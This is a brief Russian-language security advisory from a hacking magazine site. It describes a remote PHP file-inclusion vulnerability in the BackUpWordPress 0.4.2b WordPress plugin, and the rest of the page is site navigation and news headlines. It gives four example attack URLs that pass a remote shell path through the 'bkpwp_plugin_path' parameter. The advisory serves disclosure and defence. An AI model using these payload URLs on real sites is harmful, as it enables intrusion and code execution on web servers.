PHP-инклюдинг в WordPress Plugin BackUpWordPress

Рекомендуем почитать:

Хакер #306. OAuth от и до

Программа: WordPress Plugin BackUpWordPress 0.4.2b

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «bkpwp_plugin_path» различными сценариями. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Пример:

http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

PHP-инклюдинг в WordPress Plugin BackUpWordPress

Хакер #306. OAuth от и до

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Чем нам грозит 2025-й. Пытаемся предсказать тренды ИБ грядущего года

Хакеры.RU. Глава 0х09. TerraCore

Хакеры.RU. Глава 0х08. Кто хочет стать миллионером?

Хакеры.RU. Глава 0х07. Точка невозврата

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Вредоносные пакеты из npm похищали приватные ключи Ethereum-разработчиков

Стилер FireScam маскируется под Telegram Premium

Массовая атака затронула не менее 36 расширений для Google Chrome

Если пользователь ищет слово «Google» в Bing, ему показывают страницу в стиле Google

Уязвимость в сканере Nuclei позволяла обойти проверку подписи и выполнить код